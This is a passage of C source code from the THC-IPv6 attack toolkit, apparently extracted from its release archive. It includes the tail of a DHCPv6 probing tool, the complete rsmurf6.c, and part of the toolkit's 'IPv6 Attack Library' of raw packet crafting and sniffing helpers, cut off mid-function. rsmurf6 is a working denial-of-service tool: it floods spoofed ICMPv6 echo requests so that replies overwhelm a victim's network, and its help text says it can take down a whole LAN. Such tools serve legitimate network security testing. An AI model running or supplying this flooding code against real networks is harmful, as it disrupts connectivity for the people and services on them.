if ((olen = data[2] * 256 + data[3]) > len - 4 || olen < 0) { printf("Information: evil packet received\n"); olen = 0; len = -1; } else { if (data[1] > 1 && data[1] <= 3) { memcpy(mybuf + mlen, data, olen + 4); mlen += olen + 4; } else if (data[1] == 1) { memcpy(mybuf + mlen, data, olen + 4); mlen += olen + 4; if (olen == 14) smac = (char *) (data + 12); else smac = mac; } data += olen + 4; len -= olen + 4; if (len < 0) { printf("Information: evil packet received\n"); len = -1; } } } */ if (len >= 4) { counter++; printf("\nDHCPv6 packet received:\n"); printf(" Server IP6: %s\n", thc_ipv62notation(rdata + 8)); printf(" Server MAC: %02x:%02x:%02x:%02x:%02x:%02x\n", ptr[6], ptr[7], ptr[8], ptr[9], ptr[10], ptr[11]); while (len >= 4) { i = data[0] * 256 + data[1]; j = data[2] * 256 + data[3]; if (j + 4 > len) { printf("Evil Packet!\n"); return; } switch(i) { case 1: printf(""); // client identifier break; case 2: printf(""); // server identier break; case 3: if (data[16] == 0 && data[17] == 5) printf(" Address Offered: %s\n", thc_ipv62notation((unsigned char*)data + 20)); break; case 7: printf(""); // prefered value break; case 13: case 19: printf(" Status Code: %d", data[5] * 256 + data[6]); // status code break; case 23: printf(" DNS Server: %s\n", thc_ipv62notation((unsigned char*)data + 4)); break; default: printf(" Unknown option type: %d\n", i); } len -= (4 + j); data += (4 + j); } } } int main(int argc, char *argv[]) { char mac[6] = { 0, 0x0c, 0, 0, 0, 0 }, *pkt = NULL; char wdatabuf[1024]; unsigned char *mac6 = mac, *src, *dst; int i, s, len, pkt_len = 0; unsigned long long int count = 0; pcap_t *p = NULL; int do_all = 1, use_real_mac = 1, use_real_link = 1; if (argc < 2 || strncmp(argv[1], "-h", 2) == 0) help(argv[0]); if (getenv("THC_IPV6_PPPOE") != NULL || getenv("THC_IPV6_6IN4") != NULL) printf("WARNING: %s is not working with injection!\n", argv[0]); while ((i = getopt(argc, argv, "dnNr1")) >= 0) { switch (i) { case 'N': use_real_link = 1; // no break case 'n': use_real_mac = 1; break; case '1': do_all = 0; case 'r': i = 0; break; // just to ignore -r default: fprintf(stderr, "Error: unknown option -%c\n", i); exit(-1); } } memset(mac, 0, sizeof(mac)); interface = argv[optind]; if (thc_get_own_ipv6(interface, NULL, PREFER_LINK) == NULL) { fprintf(stderr, "Error: invalid interface %s\n", interface); exit(-1); } dns_name = argv[optind + 1]; if (use_real_link) src = thc_get_own_ipv6(interface, NULL, PREFER_LINK); else src = thc_resolve6("fe80::"); if (use_real_mac) mac6 = thc_get_own_mac(interface); dst = thc_resolve6("ff02::1:2"); setvbuf(stdout, NULL, _IONBF, 0); setvbuf(stderr, NULL, _IONBF, 0); // only to prevent our system to send icmp port unreachable messages if ((s = thc_bind_udp_port(546)) < 0) fprintf(stderr, "Warning: could not bind to 546/udp\n"); if ((p = thc_pcap_init_promisc(interface, "ip6 and udp and dst port 546")) == NULL) { fprintf(stderr, "Error: can not open interface %s in promisc mode\n", interface); exit(-1); } len = sizeof(solicit); memcpy(wdatabuf, solicit, len); printf("Sending DHCPv6 Solicitate message ...\n"); if (!use_real_link) memcpy(src + 8, (char *) &count, 8); // start0: 1-3 rand, 18-21 rand, 22-27 mac, 32-35 rand for (i = 0; i < 3; i++) { wdatabuf[i + 32] = rand() % 256; wdatabuf[i + 18] = rand() % 256; mac[i + 2] = rand() % 256; } if (!use_real_mac) memcpy(wdatabuf + 22, mac, 6); memcpy(wdatabuf + 1, (char *) &count + _TAKE3, 3); if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, src, dst, 1, 0, 0, 0, 0)) == NULL) return -1; if (thc_add_udp(pkt, &pkt_len, 546, 547, 0, wdatabuf, len) < 0) return -1; // we have to tone it down, otherwise we will not get advertisements if (thc_generate_and_send_pkt(interface, mac6, NULL, pkt, &pkt_len) < 0) printf("!"); alarm(5); signal(SIGALRM, clean_exit); // i = thc_send_pkt(interface, pkt, &pkt_len); pkt = thc_destroy_packet(pkt); while (1) { usleep(75); while (thc_pcap_check(p, (char *) check_packets, NULL) > 0); } return 0; // never reached } thc-ipv6-2.5/rsmurf6.c0000644000000000000000000000354612251022441013267 0ustar rootroot#include #include #include #include #include #include #include #include #include #include #include "thc-ipv6.h" void help(char *prg) { printf("%s %s (c) 2013 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE); printf("Syntax: %s interface victim-ip\n\n", prg); printf("Smurfs the local network of the victim. Note: this depends on an\n"); printf("implementation error, currently only verified on Linux.\n"); printf("Evil: \"ff02::1\" as victim will DOS your local LAN completely\n"); // printf("Use -r to use raw mode.\n\n"); exit(-1); } int main(int argc, char *argv[]) { unsigned char *pkt = NULL, buf[16], fakemac[7] = "\x00\x00\xde\xad\xbe\xef"; unsigned char *multicast6, *victim6; int pkt_len = 0; char *interface; int rawmode = 0; if (argc < 3 || strncmp(argv[1], "-h", 2) == 0) help(argv[0]); if (strcmp(argv[1], "-r") == 0) { thc_ipv6_rawmode(1); rawmode = 1; argv++; argc--; } interface = argv[1]; victim6 = thc_resolve6(argv[2]); multicast6 = thc_resolve6("ff02::1"); if (thc_get_own_ipv6(interface, NULL, PREFER_GLOBAL) == NULL) { fprintf(stderr, "Error: invalid interface %s\n", interface); exit(-1); } memset(buf, 'A', 16); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, multicast6, victim6, 0, 0, 0, 0, 0)) == NULL) return -1; if (thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, 0xfacebabe, (unsigned char *) &buf, 16, 0) < 0) return -1; if (thc_generate_pkt(interface, fakemac, NULL, pkt, &pkt_len) < 0) { fprintf(stderr, "Error: Can not generate packet, exiting ...\n"); exit(-1); } printf("Starting rsmurf6 against %s (Press Control-C to end) ...\n", argv[2]); while (1) thc_send_pkt(interface, pkt, &pkt_len); return 0; } thc-ipv6-2.5/thc-ipv6-lib.c0000644000000000000000000030313012254411074014066 0ustar rootroot/* * (c) 2013 by van Hauser / THC * * THC IPv6 Attack Library * * Functions: see README * * The AGPL v3 license applies to this code, see the LICENSE file * */ #include #include #include #include #include #include /* network */ #include #include #include #include #include #include #include //#include #include /* files */ #include #include /* misc */ #include #include /* libpcap */ #include #include "thc-ipv6.h" #ifdef _HAVE_SSL /* libssl */ #include #include #include #include #endif /* OS specifics */ #if defined(__APPLE__) #include #define bswap_16 OSSwapInt16 #define bswap_32 OSSwapInt32 #define bswap_64 OSSwapInt64 #else #include #endif #if !defined (SIOCGIFHWADDR) #include #include #include #else #include #include #endif // exported to external via thc-ipv6.h int debug = 0; int _thc_ipv6_showerrors = SHOW_LIBRARY_ERRORS; int do_hdr_size = 0, do_hdr_vlan = 0; // injection variables #define _PPPOE_HDR_SIZE 22 #define _6IN4_HDR_SIZE 34 int do_6in4 = 0, do_pppoe = 0, do_hdr_off = 0; char *do_hdr = NULL, *do_capture = NULL; // other internal global vars char default_interface[16] = "eth0"; int thc_socket = -1; int _thc_ipv6_rawmode = 0; void thc_ipv6_rawmode(int mode) { _thc_ipv6_rawmode = mode; fprintf(stderr, "Error: raw mode is not working, use THC_IPV6_... injection!\n"); exit(-1); } void thc_ipv6_show_errors(int mode) { _thc_ipv6_showerrors = mode; } unsigned char *thc_ipv6_dummymac() { char *ptr = malloc(7); if (ptr == NULL) return NULL; memset(ptr, 0xff, 6); ptr[6] = 0; return ptr; } int thc_pcap_function(char *interface, char *capture, char *function, int promisc, char *opt) { pcap_t *pcap_link = NULL; char errbuf[PCAP_ERRBUF_SIZE]; struct bpf_program fcode; if (thc_socket < 0) thc_socket = thc_open_ipv6(); if (do_pppoe || do_6in4 || do_hdr_vlan) promisc = 1; if (interface == NULL) interface = default_interface; if ((pcap_link = pcap_open_live(interface, 65535, promisc, -1, errbuf)) == NULL) return -1; if (do_pppoe || do_6in4 || do_hdr_vlan) pcap_compile(pcap_link, &fcode, do_capture, 1, 0); else if (pcap_compile(pcap_link, &fcode, capture, 1, 0) < 0) return -2; pcap_setfilter(pcap_link, &fcode); while(1) { if (pcap_dispatch(pcap_link, 1, (pcap_handler) function, opt) < 0) return -3; usleep(10); } return -4; // never reached } pcap_t *thc_pcap_init(char *interface, char *capture) { pcap_t *pcap_link = NULL; char errbuf[PCAP_ERRBUF_SIZE]; struct bpf_program fcode; int promisc = 0; if (thc_socket < 0) thc_socket = thc_open_ipv6(); if (do_pppoe || do_6in4 || do_hdr_vlan) promisc = 1; if (interface == NULL) interface = default_interface; if ((pcap_link = pcap_open_live(interface, 65535, promisc, -1, errbuf)) == NULL) return NULL; if (do_pppoe || do_6in4 || do_hdr_vlan) pcap_compile(pcap_link, &fcode, do_capture, 1, 0); else if (pcap_compile(pcap_link, &fcode, capture, 1, 0) < 0) return NULL; pcap_setfilter(pcap_link, &fcode); pcap_setnonblock(pcap_link, 1, errbuf); return pcap_link; } pcap_t *thc_pcap_init_promisc(char *interface, unsigned char *capture) { pcap_t *pcap_link = NULL; char errbuf[PCAP_ERRBUF_SIZE]; struct bpf_program fcode; if (thc_socket < 0) thc_socket = thc_open_ipv6(); if (interface == NULL) interface = default_interface; if ((pcap_link = pcap_open_live(interface, 65535, 1, -1, errbuf)) == NULL) return NULL; if (do_pppoe || do_6in4 || do_hdr_vlan) pcap_compile(pcap_link, &fcode, do_capture, 1, 0); else if (pcap_compile(pcap_link, &fcode, capture, 1, 0) < 0) return NULL; pcap_setfilter(pcap_link, &fcode); pcap_setnonblock(pcap_link, 1, errbuf); return pcap_link; } int thc_pcap_check(pcap_t * pcap_link, char *function, char *opt) { if (pcap_link == NULL) return -1; return pcap_dispatch(pcap_link, 1, (pcap_handler) function, opt); } char *thc_pcap_close(pcap_t * pcap_link) { if (pcap_link != NULL) pcap_close(pcap_link); return NULL; } /* wow, ugly, complicated work for something a standard linux library could do as well :-) */ void thc_notation2beauty(unsigned char *ipv6) { char buf[40], buf2[40] = ":0:0:", *ptr, *ptr2 = NULL; int i, j, k = 0, l = 0; if (ipv6[39] != 0 || strlen(ipv6) != 39) return; memset(buf, 0, sizeof(buf)); // remove leading zeros from ipv6-input to buf, :0023: = :23:, :0000: = :0: for (i = 0; i < 8; i++) { ptr = ipv6 + i * 4 + i; j = 0; while (*ptr == '0' && j < 3) { ptr++; j++; } memcpy(&buf[k], ptr, 4 - j); k += 4 - j; buf[k++] = ':'; } buf[k - 1] = 0; // find the longest :0: chain while ((ptr = strstr(buf, buf2)) != NULL) { ptr2 = ptr; strcat(buf2, "0:"); } // if at least :0:0: is found, on the longest replace with ::, ptr2 shows where if (ptr2 != NULL) { buf2[strlen(buf2) - 2] = 0; memset(ipv6, 0, 40); // special case: 0000::.... if (buf + 1 == ptr2 && buf[0] == '0') { ipv6[0] = ':'; l = -1; } else memcpy(ipv6, buf, ptr2 - buf + 1); memcpy(ipv6 + (ptr2 - buf + 1 + l), ptr2 + strlen(buf2) - 1, strlen(buf) - (ptr2 - buf) - strlen(buf2) + 1); // special case ....::0000 if (ipv6[strlen(ipv6) - 1] == '0' && ipv6[strlen(ipv6) - 2] == ':' && ptr2 - buf + 1 + strlen(buf2) == strlen(buf)) ipv6[strlen(ipv6) - 1] = 0; } else strcpy(ipv6, buf); // if (strncmp(ipv6, "::ffff:", 7) == 0 && strlen(ipv6) <= 16) { // printf("XXX beauty for ::ffff:123.123.132.123\n"); // } } unsigned char *thc_ipv62string(unsigned char *ipv6) { char *string = malloc(33); int a; if (ipv6 != NULL && string != NULL) { for (a = 0; a < 16; a++) { if (ipv6[a] / 16 >= 10) string[a * 2] = 'a' + ipv6[a] / 16 - 10; else string[a * 2] = '0' + ipv6[a] / 16; if (ipv6[a] % 16 >= 10) string[a * 2 + 1] = 'a' + ipv6[a] % 16 - 10; else string[a * 2 + 1] = '0' + ipv6[a] % 16; } string[32] = 0; } else return NULL; return string; } unsigned char *thc_string2ipv6(unsigned char *string) { unsigned char *ipv6 = malloc(16); int a; if (string != NULL && ipv6 != NULL) { for (a = 0; a < 16; a++) { ipv6[a] = (string[2 * a] >= 'a' ? 10 + string[2 * a] - 'a' : string[2 * a] - '0') * 16; ipv6[a] += string[2 * a + 1] >= 'a' ? 10 + string[2 * a + 1] - 'a' : string[2 * a + 1] - '0'; } } else return NULL; return ipv6; } unsigned char *thc_string2notation(unsigned char *string) { unsigned char *notation = malloc(40); int a; if (notation != NULL && string != NULL) { for (a = 0; a < 8; a++) { memcpy(notation + a * 5, string + a * 4, 4); notation[4 + a * 5] = ':'; } notation[39] = 0; } else return NULL; thc_notation2beauty(notation); return notation; } unsigned char *thc_ipv62notation(unsigned char *ipv6) { char *res, *ptr; if (ipv6 == NULL) return NULL; if ((res = thc_ipv62string(ipv6)) == NULL) return NULL; ptr = thc_string2notation(res); free(res); return ptr; } int calculate_checksum(unsigned char *data, int data_len) { int i = 0, checksum = 0; if (debug) thc_dump_data(data, data_len, "Checksum Packet Data"); while (i < data_len) { if (i++ % 2 == 0) checksum += *data++; else checksum += *data++ << 8; } checksum = (checksum & 0xffff) + (checksum >> 16); checksum = htons(~checksum); return checksum; } int checksum_pseudo_header(unsigned char *src, unsigned char *dst, unsigned char type, unsigned char *data, int length) { unsigned char ptr[40 + length + 48]; int checksum; if (src == NULL || dst == NULL || data == NULL || length < 0) return -1; if (length + 40 > 65535) if (_thc_ipv6_showerrors) fprintf(stderr, "Warning: checksums for packets > 65535 are unreliable due implementation differences on target platforms\n"); memset(&ptr, 0, 40 + length); if (type == NXT_IP4 || type == NXT_IP4_RUDIMENTARY) { memcpy(ptr, data, length); checksum = calculate_checksum(ptr, length); } else { memcpy(&ptr[0], src, 16); memcpy(&ptr[16], dst, 16); ptr[34] = length / 256; ptr[35] = length % 256; ptr[39] = type; if (data != NULL && length > 0) memcpy(&ptr[40], data, length); checksum = calculate_checksum(ptr, 40 + length); } /*if (length > 65495) { printf("DEBUG length: %d, high: %d, low: %d, sum: %x\n", length, ptr[34], ptr[35], checksum); printf("65535: %x\n", calculate_checksum(ptr, 65535)); printf("65536: %x\n", calculate_checksum(ptr, 65536)); printf("65535+40: %x\n", calculate_checksum(ptr, 65535 + 40)); printf("65535+40: %x\n", calculate_checksum(ptr, 65536 + 40)); }*/ if (type == NXT_UDP && checksum == 0) checksum = 65535; if (debug) printf("Checksum: %d = %p, %p, %d, %p, %d\n", checksum, src, dst, type, data, length); return checksum; } unsigned char *thc_resolve6(char *target) { char *ret_addr, *ptr2, *ptr = target, tmp[264]; struct in6_addr glob_in6; char *glob_addr = (char *) &glob_in6; struct addrinfo glob_hints, *glob_result; unsigned char out[64]; if (target == NULL) return NULL; if (index(target, '/') != NULL || *target == '[' || index(target, '%') != NULL) { ptr = strncpy(tmp, target, sizeof(tmp) - 1); tmp[sizeof(tmp) - 1] = 0; if ((ptr2 = index(tmp, '/')) != NULL) *ptr2 = 0; if ((ptr2 = index(tmp, '%')) != NULL) *ptr2 = 0; if (*ptr == '[') { ptr++; if ((ptr2 = index(tmp, ']')) != NULL) *ptr2 = 0; } } memset(&glob_hints, 0, sizeof(glob_hints)); glob_hints.ai_family = AF_INET6; if (getaddrinfo(ptr, NULL, &glob_hints, &glob_result) != 0) return NULL; if (getnameinfo(glob_result->ai_addr, glob_result->ai_addrlen, out, sizeof(out), NULL, 0, NI_NUMERICHOST) != 0) return NULL; if (inet_pton(AF_INET6, out, glob_addr) < 0) return NULL; if ((ret_addr = malloc(16)) == NULL) return NULL; memcpy(ret_addr, glob_in6.s6_addr, 16); if (debug) thc_dump_data(ret_addr, 16, "Target Resolve IPv6"); freeaddrinfo(glob_result); return ret_addr; } int thc_get_mtu(char *interface) { int s; struct ifreq ifr; if (interface == NULL) interface = default_interface; if ((s = socket(AF_INET, SOCK_DGRAM, 0)) < 0) return -1; memset(&ifr, 0, sizeof(ifr)); snprintf(ifr.ifr_name, sizeof(ifr.ifr_name), "%s", interface); if (ioctl(s, SIOCGIFMTU, (int8_t *) & ifr) < 0) return -1; close(s); if (debug) printf("DEBUG: MTU %d\n", ifr.ifr_mtu); return ifr.ifr_mtu; } unsigned char *thc_get_own_mac(char *interface) { int s; struct ifreq ifr; char *mac; if (interface == NULL) interface = default_interface; if (_thc_ipv6_rawmode) return thc_ipv6_dummymac(); #if !defined (SIOCGIFHWADDR) struct ifaddrs *ifa, *ifx = NULL; struct sockaddr_dl *dl; getifaddrs(&ifa); ifx = ifa; mac = malloc(6); while (ifa != NULL) { dl = (struct sockaddr_dl *) ifa->ifa_addr; if (debug) thc_dump_data(dl->sdl_data, dl->sdl_nlen, "Interface loop"); if (dl->sdl_nlen > 0 && strncmp(interface, dl->sdl_data, dl->sdl_nlen) == 0) { memcpy(mac, LLADDR(dl), 6); break; } else { ifa = ifa->ifa_next; } } if (ifa == NULL) { freeifaddrs(ifx); return NULL; // error: could not find requested interface. } else { freeifaddrs(ifx); } #else /* SIOCGIFHWADDR */ if ((s = socket(AF_INET, SOCK_DGRAM, 0)) < 0) return NULL; memset(&ifr, 0, sizeof(ifr)); snprintf(ifr.ifr_name, sizeof(ifr.ifr_name), "%s", interface); if (ioctl(s, SIOCGIFHWADDR, (int8_t *) & ifr) < 0) return NULL; mac = malloc(6); memcpy(mac, &ifr.ifr_hwaddr.sa_data, 6); close(s); #endif if (debug) thc_dump_data(mac, 6, "Own MAC address"); return mac; } unsigned char *thc_get_own_ipv6(char *interface, unsigned char *dst, int prefer) { char *myipv6; FILE *f; unsigned char ipv6[34] = "", save[34] = "", tmpbuf[34], buf[1024], *tmpdst = NULL; int a, b, c, done = 0, picky = 0, orig_prefer = prefer; unsigned char tmpd, tmpb; char bla[16]; if (interface == NULL) interface = default_interface; if (dst != NULL && dst[0] == 0xff) dst = NULL; if (dst != NULL && dst[0] == 0xfe) prefer = PREFER_LINK; if (dst != NULL && dst[0] != 0xfe) prefer = PREFER_GLOBAL; if (dst != NULL) tmpdst = thc_ipv62string(dst); memset(save, 0, sizeof(save)); while (done < 2 && picky < 2) { if ((f = fopen("/proc/net/if_inet6", "r")) == NULL) { fprintf(stderr, "Error: /proc/net/if_inet6 does not exist, no IPv6 support on your Linux box!\n"); return NULL; } if (picky == 1) { if (prefer == PREFER_GLOBAL) prefer = PREFER_LINK; else prefer = PREFER_GLOBAL; } while (done < 2 && fgets(buf, sizeof(buf), f) != NULL) { if (strncmp(interface, &buf[strlen(buf) - strlen(interface) - 1], strlen(interface)) == 0) { sscanf(buf, "%s %x %x %x %s", tmpbuf, &a, &b, &c, bla); if (c == prefer && done == 0) { ipv6[0] = c; // scope type ipv6[1] = b; // netmask memcpy(&ipv6[2], tmpbuf, 32); ipv6[34] = 0; if (dst == NULL) done = 2; else done = 1; } // if a destination was given, we always prefer the local ip which is in the same subnet of the target if (dst != NULL) { if (strncmp(tmpbuf, tmpdst, b / 4) == 0) { if (b % 4 > 0) { tmpb = tmpbuf[b / 4 + 1] >> (b % 4); tmpd = tmpdst[b / 4 + 1] >> (b % 4); if (tmpb == tmpd) { done = 2; } } else done = 2; if (done == 2) { if (debug) printf("DEBUG: Found local IPv6 address to destination\n"); ipv6[0] = c; // scope type ipv6[1] = b; // netmask memcpy(&ipv6[2], tmpbuf, 32); ipv6[34] = 0; } } } // ensure that 2000::/3 and fc00::/7 is selected correctly if (done != 2 && dst != NULL) { if ( ((strncmp(tmpbuf, "fc", 2) == 0 || strncmp(tmpbuf, "fd", 2) == 0) && (strncmp(tmpdst, "fc", 2) == 0 || strncmp(tmpdst, "fd", 2) == 0)) || ((tmpdst[0] == '2' || tmpdst[0] == '3') && (tmpbuf[0] == '2' || tmpbuf[0] == '3')) ) { //printf("SAVE! %s -> %s\n", tmpbuf, tmpdst); memcpy(save + 2, tmpbuf, 32); memset(ipv6, 0, sizeof(ipv6)); done = 0; } if ( save[2] == 0 && ( ((strncmp(tmpbuf, "fc", 2) == 0 || strncmp(tmpbuf, "fd", 2) == 0) && (tmpdst[0] == '2' || tmpdst[0] == '3')) || ((strncmp(tmpdst, "fc", 2) == 0 && strncmp(tmpdst, "fd", 2) == 0) && (tmpbuf[0] == '2' || tmpbuf[0] == '3')) ) ) { //printf("RESORT! %c -> %c\n", tmpbuf[1], tmpdst[0]); memcpy(save + 2, tmpbuf, 32); memset(ipv6, 0, sizeof(ipv6)); done = 0; } } } } fclose(f); picky++; //printf("x %d, %s == 0, %s > 0\n", done, ipv6 + 2, save + 2 ); if (done < 2 && strlen(&ipv6[2]) == 0 && strlen(&save[2]) > 0) { //printf("y\n"); memcpy(ipv6, save, sizeof(ipv6)); done = 2; } } //printf("%s > 0, %s== fe80\n", save +2, ipv6 +2); if (strlen(&save[2]) > 0 && prefer == PREFER_GLOBAL && strncmp(ipv6 + 2, "fe80", 2) == 0) { //printf("z\n"); memcpy(ipv6, save, sizeof(ipv6)); done = 2; } if (strlen(&ipv6[2]) == 0) { if (_thc_ipv6_showerrors) fprintf(stderr, "Warning: no IPv6 address on interface defined\n"); return NULL; } if (picky == 2 && orig_prefer != ipv6[0]) if (_thc_ipv6_showerrors) fprintf(stderr, "Warning: unprefered IPv6 address had to be selected\n"); if (tmpdst != NULL) free(tmpdst); tmpdst = thc_string2notation(&ipv6[2]); myipv6 = thc_resolve6(tmpdst); free(tmpdst); if (debug) thc_dump_data(myipv6, 16, "Own IPv6 address"); return myipv6; } unsigned char *thc_get_multicast_mac(unsigned char *dst) { unsigned char *mac; if (_thc_ipv6_rawmode) return thc_ipv6_dummymac(); if (dst == NULL || (mac = malloc(6)) == NULL) return NULL; mac[0] = 0x33; mac[1] = 0x33; memcpy(&mac[2], dst + 12, 4); return mac; } void thc_get_mac_from_sniff(u_char *foo, const struct pcap_pkthdr *header, const unsigned char *data) { int off = 0, len = header->caplen - 14; unsigned char *ptr = (unsigned char*)data + 14; if (do_hdr_size) { ptr += (do_hdr_size - 14); len -= (do_hdr_size - 14); if ((ptr[0] & 240) != 0x60) return; } if (ptr[6] == NXT_FRAG) { if (ptr[40] == NXT_ICMP6) off = 8; else return; } else if (ptr[6] != NXT_ICMP6) return; if (ptr[40 + off] != ICMP6_NEIGHBORADV) return; if (len < 64 + off) return; if (memcmp(ptr + 48 + off, foo + 7, 16) != 0) return; foo[0] = 32; if (len >= 72 && ptr[64 + off] == 2 && ptr[65 + off] == 1) memcpy(foo + 1, ptr + 66 + off, 6); else memcpy(foo + 1, data + 6, 6); } unsigned char *thc_lookup_ipv6_mac(char *interface, unsigned char *dst) { unsigned char *mac = NULL; time_t curr; int count = 0, found = 0; char string[64] = "ip6 and dst ", resolved_mac[23] = "", *p1, *p2, *mysrc; pcap_t *p; if (thc_socket < 0) thc_socket = thc_open_ipv6(); if (_thc_ipv6_rawmode || do_pppoe || do_6in4 || do_hdr_vlan) return thc_ipv6_dummymac(); if (dst == NULL) return NULL; if (interface == NULL) interface = default_interface; if ((p1 = thc_get_own_ipv6(interface, dst, PREFER_LINK)) == NULL) return NULL; mysrc = p1; if ((p2 = thc_ipv62notation(p1)) == NULL) { return NULL; } strcat(string, p2); free(p2); memcpy(resolved_mac + 7, dst, 16); if ((p = thc_pcap_init(interface, string)) == NULL) { free(mysrc); return NULL; } while (found == 0 && count < 3) { //printf("X %d %p %02x%02x %p %02x%02x\n", count, mysrc, mysrc[14], mysrc[15], dst, dst[14], dst[15]); thc_neighborsol6(interface, mysrc, NULL, dst, NULL, NULL); curr = time(NULL); while (found == 0 && time(NULL) < curr + 2) { thc_pcap_check(p, (char *) thc_get_mac_from_sniff, resolved_mac); if (resolved_mac[0] != 0) { found = 1; if ((mac = malloc(6)) == NULL) { free(mysrc); return NULL; } memcpy(mac, resolved_mac + 1, 6); } } count++; } thc_pcap_close(p); free(mysrc); if (debug) thc_dump_data(mac, 6, "MAC address for packet target"); return mac; } /* If the following looks like shit to you: This is code submitted by Dan Kaminksy with whom I bet that he is not able to code a 1 page function which extracts the mac address from the neighbor cache on linux - which is such a complex and horrible implementation. Well you get what you ask for - a function which will break once the interface even slightly changes ... but its 1 page. */ unsigned char *thc_look_neighborcache(unsigned char *dst) { int fd, fromlen, gotsize, rcvbuf = 65535; struct sockaddr_nl nladdr; unsigned char buf[32768], *ptr, *found; // char magic[] = { 0x80, 0x00, 0x00, 0x01, 0x14, 0x00, 0x01, 0x00 }; char blob[] = { 0x14, 0x00, 0x00, 0x00, 0x1e, 0x00, 0x01, 0x03, 0xda, 0x0f, 0xb8, 0x43, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }; fd = socket(AF_NETLINK, SOCK_RAW, NETLINK_ROUTE); memset(&nladdr, 0, sizeof(struct sockaddr_nl)); nladdr.nl_family = AF_NETLINK; setsockopt(fd, SOL_SOCKET, SO_RCVBUF, &rcvbuf, sizeof(rcvbuf)); bind(fd, (struct sockaddr *) &nladdr, sizeof(nladdr)); sendto(fd, blob, sizeof(blob), 0, (struct sockaddr *) &nladdr, sizeof(nladdr)); fromlen = sizeof(nladdr); gotsize = recvfrom(fd, buf, sizeof(buf), 0, (struct sockaddr *) &nladdr, &fromlen); shutdown(fd, SHUT_RDWR); close(fd); if (debug) thc_dump_data(buf, gotsize, "Neighbor cache lookup result"); // if ((ptr = thc_memstr(buf, magic, gotsize, sizeof(magic))) == NULL) // return NULL; if ((ptr = thc_memstr(buf, dst, gotsize /* - (ptr - buf) */ , 16)) == NULL) return NULL; if ((found = malloc(7)) == NULL) return NULL; memcpy(found, ptr + 16 + 4, 6); found[6] = 0; return found; } int thc_is_dst_local(char *interface, unsigned char *dst) { int local = 0; FILE *f; unsigned char tmpbuf[34], buf[1024], *tmpdst = NULL; int a, b, c /*, found = 0, fd = -1 */ ; unsigned char tmpd, tmpb; char bla[16]; if (thc_socket < 0) thc_socket = thc_open_ipv6(); if (_thc_ipv6_rawmode || dst == NULL || do_pppoe || do_6in4 || do_hdr_vlan) return 0; if (interface == NULL) interface = default_interface; if (dst[0] == 0xff) // multicast address ? return 1; if (dst[0] == 0xfe && dst[1] == 0x80) // link local return 1; tmpdst = thc_ipv62string(dst); if ((f = fopen("/proc/net/if_inet6", "r")) == NULL) { fprintf(stderr, "Error: /proc/net/if_inet6 does not exist, no IPv6 support on your Linux box!\n"); exit(-1); } while (local == 0 && fgets(buf, sizeof(buf), f) != NULL) { if (strncmp(interface, &buf[strlen(buf) - strlen(interface) - 1], strlen(interface)) == 0) { sscanf(buf, "%s %x %x %x %s", tmpbuf, &a, &b, &c, bla); if (strncmp(tmpbuf, tmpdst, b / 4) == 0) { if (b % 4 > 0) { tmpb = tmpbuf[b / 4 + 1] >> (b % 4); tmpd = tmpdst[b / 4 + 1] >> (b % 4); if (tmpb == tmpd) { local = 1; } } else local = 1; } } } fclose(f); if (debug) printf("DEBUG: is dst local: %d\n", local); free(tmpdst); return local; } unsigned char *thc_get_mac(char *interface, unsigned char *src, unsigned char *dst) { int local = 0; FILE *f; unsigned char tmpbuf[34], router1[34], router2[34], defaultgw[34] = "", buf[1024], *tmpdst = NULL; int a, b, c /*, found = 0, fd = -1 */ ; unsigned char tmpd, tmpb; char bla[16], *ret, *p1; if (thc_socket < 0) thc_socket = thc_open_ipv6(); if (_thc_ipv6_rawmode || do_pppoe || do_6in4 || do_hdr_vlan) return thc_ipv6_dummymac(); if (dst == NULL) return NULL; if (interface == NULL) interface = default_interface; if (dst[0] == 0xff) // then its a multicast target return thc_get_multicast_mac(dst); tmpdst = thc_ipv62string(dst); if ((f = fopen("/proc/net/if_inet6", "r")) == NULL) { fprintf(stderr, "Error: /proc/net/if_inet6 does not exist, no IPv6 support on your Linux box!\n"); exit(-1); } while (local == 0 && fgets(buf, sizeof(buf), f) != NULL) { if (strncmp(interface, &buf[strlen(buf) - strlen(interface) - 1], strlen(interface)) == 0) { sscanf(buf, "%s %x %x %x %s", tmpbuf, &a, &b, &c, bla); if (strncmp(tmpbuf, tmpdst, b / 4) == 0) { if (b % 4 > 0) { tmpb = tmpbuf[b / 4 + 1] >> (b % 4); tmpd = tmpdst[b / 4 + 1] >> (b % 4); if (tmpb == tmpd) { local = 1; } } else local = 1; } } } fclose(f); if (debug) printf("DEBUG: is mac local: %d\n", local); if (!local) { if ((f = fopen("/proc/net/ipv6_route", "r")) == NULL) { fprintf(stderr, "Error: /proc/net/ipv6_route does not exist, no IPv6 support on your Linux box!\n"); exit(-1); } while (local == 0 && fgets(buf, sizeof(buf), f) != NULL) { if (strncmp(interface, &buf[strlen(buf) - strlen(interface) - 1], strlen(interface)) == 0) { sscanf(buf, "%s %x %s %x %s %s", tmpbuf, &b, router1, &a, router2, bla); if (b > 0) { if (strncmp(tmpbuf, tmpdst, b / 4) == 0) { if (b % 4 > 0) { tmpb = tmpbuf[b / 4 + 1] >> (b % 4); tmpd = tmpdst[b / 4 + 1] >> (b % 4); if (tmpb == tmpd) local = 1; } else local = 1; } } else strcpy(defaultgw, router2); if (local == 1) { if (debug) printf("DEBUG: router found for %s: %s\n", tmpdst, router2); strcpy(tmpdst, router2); } } } if (local == 0 && strlen(defaultgw) > 0) { if (debug) printf("DEBUG: using default router for %s: %s\n", tmpdst, defaultgw); strcpy(tmpdst, defaultgw); local = 1; } if (local == 0) { if (_thc_ipv6_showerrors) fprintf(stderr, "Error: No idea where to route the packet to %s!\n", tmpdst); fclose(f); free(tmpdst); return NULL; } fclose(f); } p1 = thc_string2ipv6(tmpdst); if ((ret = thc_look_neighborcache(p1)) != NULL) { free(p1); free(tmpdst); return ret; } ret = thc_lookup_ipv6_mac(interface, p1); free(tmpdst); free(p1); return ret; } unsigned char *thc_inverse_packet(unsigned char *pkt, int pkt_len) { unsigned char tmp[16]; int type = -1, iptr = 0, checksum; char *src = &pkt[8], *dst = &pkt[24]; if (pkt == NULL) return NULL; pkt[7] = 255; // ttl memcpy(tmp, pkt + 8, 16); // reverse IP6 src and dst memcpy(pkt + 